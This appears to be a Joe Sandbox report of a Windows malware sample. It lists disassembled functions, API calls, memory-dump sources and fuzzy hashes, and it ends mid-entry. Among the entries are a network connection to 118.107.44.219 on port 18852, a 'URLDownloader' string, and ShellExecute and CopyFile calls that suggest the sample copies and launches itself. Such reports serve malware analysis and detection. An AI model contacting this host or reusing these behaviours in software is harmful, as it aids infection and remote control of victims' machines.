                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2933794660-0
                                                                                                                            • Opcode ID: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction ID: 6b5b90a3d804e5009f3a100d95e0ac76ac391a824cc924ed74941b345312ade6
                                                                                                                            • Opcode Fuzzy Hash: 842f5c9d0410f161de26bc26939d162bf704e3e37519bf8139df35696172d6f0
                                                                                                                            • Instruction Fuzzy Hash: 2CF05F74D1021DEBDB41DBB4CA8999EBBF4EF1C204BA18695E412E6110E630AB489B50
                                                                                                                            Function 10016721 Relevance: 1.7, APIs: 1, Instructions: 242COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 10016737
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                                            • Instruction ID: 772fdfb54747e28d4c8254296b593cf3c963f9d1e760632a41fcaf1a051b6687
                                                                                                                            • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                                            • Instruction Fuzzy Hash: ABA128B1A10669CBEB15CF54CCC1BA9BBF4FB48364F19C62AE415AB290D374D984CF90
                                                                                                                            Function 026366F8 Relevance: 1.7, APIs: 1, Instructions: 242COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0263670E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2325560087-0
                                                                                                                            • Opcode ID: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                                            • Instruction ID: e6c6fec7ae7101685e9b01f6dfc6572e35a4fe887ec43b8657e6c8b5c16cb06e
                                                                                                                            • Opcode Fuzzy Hash: 9ecbffd9c5d5d9a9a992ff49c4f9a74f3e595809584edb45dd89270ad41c5a6f
                                                                                                                            • Instruction Fuzzy Hash: 16A15BB1A00629DBEB1ACF54C8C1BA9BBB4FB48364F19C62AE415E73A0D374D550CF94
                                                                                                                            Function 02620AE4 Relevance: .1, Instructions: 87COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                            • Instruction ID: bcf11820cf15e6dd1a9b0761c6477f72427a0084a1aec283165053ba3dece4b4
                                                                                                                            • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                                                                            • Instruction Fuzzy Hash: DC319A76A08B668FC324DF18C480926B7E4FF99319F1A096DE88587312E331F959CF91
                                                                                                                            Function 10015490 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                                                            • getaddrinfo.WS2_32(118.107.44.219,18852,?,00000000), ref: 100154FA
                                                                                                                            • WSACleanup.WS2_32 ref: 10015509
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                                                            • socket.WS2_32(?,?,?), ref: 10015552
                                                                                                                            • WSACleanup.WS2_32 ref: 10015566
                                                                                                                            • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                                                            • String ID: 118.107.44.219$18852
                                                                                                                            • API String ID: 2357443324-3001398927
                                                                                                                            • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                                                            • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                                                            Function 02635467 Relevance: 19.7, APIs: 13, Instructions: 163networkCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • WSAStartup.WS2_32(00000202,?), ref: 0263548A
                                                                                                                            • getaddrinfo.WS2_32(1001C0E0,100185B0,?,00000000), ref: 026354D1
                                                                                                                            • WSACleanup.WS2_32 ref: 026354E0
                                                                                                                            • socket.WS2_32(?,?,?), ref: 02635529
                                                                                                                            • WSACleanup.WS2_32 ref: 0263553D
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cleanup$Startupgetaddrinfosocket
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2560534018-0
                                                                                                                            • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction ID: 15e04af564f46df95c48600176dcebb828335c63c979c30c9fe9839e56da6af9
                                                                                                                            • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                                                            • Instruction Fuzzy Hash: 346118B1904229EFEB05CFA8C988FAD77B5FB0C315F108619E51AA72A0D734DA41CF65
                                                                                                                            Function 02621637 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 179windowregistrythreadCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 02621659
                                                                                                                              • Part of subcall function 02621407: SHGetKnownFolderPath.SHELL32(10018310,00000000,00000000,00000000), ref: 02621462
                                                                                                                              • Part of subcall function 02621407: CoTaskMemFree.COMBASE(00000000), ref: 026214B5
                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005760,00000000,00000000,00000000), ref: 0262176F
                                                                                                                            • RegisterClassW.USER32(?), ref: 026217CE
                                                                                                                            • GetSystemMetrics.USER32(00000001), ref: 026217D6
                                                                                                                            • GetSystemMetrics.USER32(00000000), ref: 026217E9
                                                                                                                            • CreateWindowExW.USER32(00000000,?,?,00C40000,?,?,00000190,00000078,00000000,00000000,00000000,00000000), ref: 02621835
                                                                                                                            • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?), ref: 02621844
                                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0262186B
                                                                                                                            • TranslateMessage.USER32(?), ref: 02621879
                                                                                                                            • DispatchMessageW.USER32(?), ref: 02621883
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$CreateMetricsSystemWindow$ClassDispatchFolderFreeHandleKnownModulePathRegisterShowTaskThreadTranslate
                                                                                                                            • String ID: URLDownloader
                                                                                                                            • API String ID: 3953380684-1891997712
                                                                                                                            • Opcode ID: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                                            • Instruction ID: 00d9b1859f1c075277666cc891b7ef4559c7c31b02a7582652f8be7fb878c3ea
                                                                                                                            • Opcode Fuzzy Hash: 0f4a2f577f0c68d67d589a0c1dc5661a83d037daf289d79df61bc5f5d54133cf
                                                                                                                            • Instruction Fuzzy Hash: 30712BB1D00618EFEB54DFA8CC95BDDBBB5EF48300F108169E609AB280E7749A44CF55
                                                                                                                            Function 10016EA0 Relevance: 18.2, APIs: 12, Instructions: 154memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,10001A66,00000000,00000000,9A569D70,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016F29
                                                                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016F65
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,10001A64,?,00000000,00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FA4
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 10016FAF
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,10001BE4,10001A64,00000000,?,10001A64), ref: 10016FC0
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FD8
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FE2
                                                                                                                            • GetLastError.KERNEL32(80070057,9A569D70,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10016FE7
                                                                                                                            • _com_issue_error.COMSUPP ref: 10016FFA
                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017008
                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,10001BE4,10001A64,00000000,?,10001A64,100027CC), ref: 10017010
                                                                                                                            • _com_issue_error.COMSUPP ref: 10017023
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWidefree$AllocStringmalloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2710271231-0
                                                                                                                            • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction ID: 6285890bd5176054e2d15964e4e0697efcddc290ec620ce681aa416c4b1e3c3a
                                                                                                                            • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction Fuzzy Hash: EA41C3B5A00219ABD700CFA8DC45B9EBBE9FB4C650F114229F509EB281D735E981CBA0
                                                                                                                            Function 02636E77 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,02621A3B,02621A3D,00000000,00000000,1001C040,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636F00
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,02621A3B,?,00000000,00000000,?,02621BBB,02621A3B,00000000,?,02621A3B), ref: 02636F7B
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 02636F86
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FAF
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FB9
                                                                                                                            • GetLastError.KERNEL32(80070057,1001C040,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636FBE
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FD1
                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,?,02621BBB,02621A3B,00000000,?,02621A3B,026227A3), ref: 02636FE7
                                                                                                                            • _com_issue_error.COMSUPP ref: 02636FFA
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1353541977-0
                                                                                                                            • Opcode ID: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction ID: 57e6c18f2d0464313a708cb3443653368f3ef238eba665d11c55c8612118f9c4
                                                                                                                            • Opcode Fuzzy Hash: 36a79a949d6c8b34454c645a8cc607a47bcf98233b07f76ab1fadc82befca182
                                                                                                                            • Instruction Fuzzy Hash: 4C41C3B1A04219ABDB129F68CC44BAEBBEEEF48714F14822DE505E7340D734D6148BA9
                                                                                                                            Function 100164C3 Relevance: 13.6, APIs: 9, Instructions: 135COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • __RTC_Initialize.LIBCMT ref: 1001650A
                                                                                                                            • ___scrt_uninitialize_crt.LIBCMT ref: 10016524
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2442719207-0
                                                                                                                            • Opcode ID: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                                            • Instruction ID: a50b9bcbe80e21d08239303d3e1b85a5ff725acd6039f41ad542be21913079e7
                                                                                                                            • Opcode Fuzzy Hash: 256b102e24a693d9f51ba83eb3981e94a0f04eba2416ad11eb438865fe32d69a
                                                                                                                            • Instruction Fuzzy Hash: A7419372E01629AFDB21CF94DD41B9E7AB9EB4C690F118129F8146F151C731DE818BE0
                                                                                                                            Function 10012150 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012187
                                                                                                                            • ?pptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012194
                                                                                                                            • ?epptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001219F
                                                                                                                            • ?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 100121BB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?pptr@?$basic_streambuf@$?epptr@?$basic_streambuf@Pninc@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1504536088-3916222277
                                                                                                                            • Opcode ID: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                                            • Instruction ID: a0487576b8a3c5ffe6c335ea50ad64326e07086e404223857e371bd2d0d575a7
                                                                                                                            • Opcode Fuzzy Hash: b236a37fb06bdb8dee8e7b599258b0d5f450d0f7872909518222e9a22227080f
                                                                                                                            • Instruction Fuzzy Hash: 9C5161F5D00119EFDB04CFD4D8819EEBBB5EF48244F148459E901AB241EB34EBA4CBA5
                                                                                                                            Function 026357F7 Relevance: 10.9, APIs: 7, Instructions: 357filesynchronizationCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 02635727: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0263575A
                                                                                                                              • Part of subcall function 026356D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 026356F5
                                                                                                                            • _Smanip.LIBCPMTD ref: 02635AE1
                                                                                                                            • _Smanip.LIBCPMTD ref: 02635B7B
                                                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 02635CB8
                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02635CD4
                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02635CE1
                                                                                                                            • CopyFileA.KERNEL32(00000000,?,00000000), ref: 02635D4A
                                                                                                                            • ShellExecuteA.SHELL32(00000000,100185D4,?,00000000,00000000,00000001), ref: 02635D70
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2091798263.0000000002620000.00000040.00001000.00020000.00000000.sdmp, Offset: 02620000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_2620000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$ExecuteModuleNameShellSmanip$CloseCopyHandleObjectSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2489516046-0
                                                                                                                            • Opcode ID: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                                            • Instruction ID: 22a55d60e06d6c4e632a0daccce3c3a5bdebbe4673381772e0199da5d10e0187
                                                                                                                            • Opcode Fuzzy Hash: 0fe253082a74fc7e1f2c5e44154e34defa3da35614f529e5d97aba5e42ca8e7c
                                                                                                                            • Instruction Fuzzy Hash: AD022170D082D8DEEB12DBA8C858BDDBFB16F15304F0441DDD5496B282D7BA1A88CF66
                                                                                                                            Function 10011CD0 Relevance: 10.7, APIs: 7, Instructions: 190COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CF2
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011CFF
                                                                                                                            • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10011D0A
                                                                                                                            • ?_Gninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10011D17
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@Gninc@?$basic_streambuf@
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 623893373-0
                                                                                                                            • Opcode ID: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                                            • Instruction ID: a0288be0b98a9ca1868d6d550198ab6d9a445e2d27cbf722241acd90e910a963
                                                                                                                            • Opcode Fuzzy Hash: 52e15d50399265125c64f399d886bb165b5bbf37f1e1fda9a42ed22037138c62
                                                                                                                            • Instruction Fuzzy Hash: 23716AB5C1021DDFDB18DFE4D8959EEB7B1FF04250F104129E516AB291EB30AE85CBA1
                                                                                                                            Function 10011B60 Relevance: 10.6, APIs: 7, Instructions: 124COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MAE_JPAD_J@Z.MSVCP140(?,?,00000000), ref: 10011B98
                                                                                                                            • ?_Gnavail@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBE_JXZ.MSVCP140 ref: 10011BB8
                                                                                                                            • _Min_value.LIBCPMTD ref: 10011BCF
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10011BE3
                                                                                                                            • ?gbump@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXH@Z.MSVCP140(?), ref: 10011C0F
                                                                                                                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000FFF,00000000), ref: 10011C4D
                                                                                                                            • fread.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,00000000), ref: 10011C9E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: D@std@@@std@@U?$char_traits@$fread$?gbump@?$basic_streambuf@?gptr@?$basic_streambuf@?xsgetn@?$basic_streambuf@Gnavail@?$basic_streambuf@Min_value
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1591557727-0
                                                                                                                            • Opcode ID: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                                            • Instruction ID: e0e71f9b7f058a59da033de4bce7e27fb15f803cdd6c81aee40a3e1b4d5913a5
                                                                                                                            • Opcode Fuzzy Hash: d4fc38bd5d27632a969096010cf362d5f07236698e0cba18835fbb4ee552d5b6
                                                                                                                            • Instruction Fuzzy Hash: CF51C775E00109EFDB48CF98C984AEEBBB5FF88344F108169E905AB354D730AE85DB90
                                                                                                                            Function 10016571 Relevance: 10.6, APIs: 7, Instructions: 87COMMONLIBRARYCODE
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2094553995.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2094527227.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094747432.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094802218.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2094826573.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_10000000_HGwpjJUqhW.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: dllmain_raw$Main@12dllmain_crt_dispatch
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3353612457-0
                                                                                                                            • Opcode ID: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                                            • Instruction ID: 54edc5666c311e175fc24a18419b6af998dcce978129f85e44b2e6ec709a6a51
                                                                                                                            • Opcode Fuzzy Hash: 98b3f14604f10840f3c0567c90b7ef5983de27fd412168009cf08e435744699c
                                                                                                                            • Instruction Fuzzy Hash: E6216DB2D01669ABDB21CF55DD41E6E3AA9EB8CAD0F014129F8146F255C231DE819BE0
                                                                                                                            Function 10012000 Relevance: 9.1, APIs: 6, Instructions: 106COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001200D
                                                                                                                            • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1001201E
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 10012029
                                                                                                                            • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?), ref: 10012053
                                                                                                                            • ?_Gndec@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 10012083
                                                                                                                            Memory Dump Source
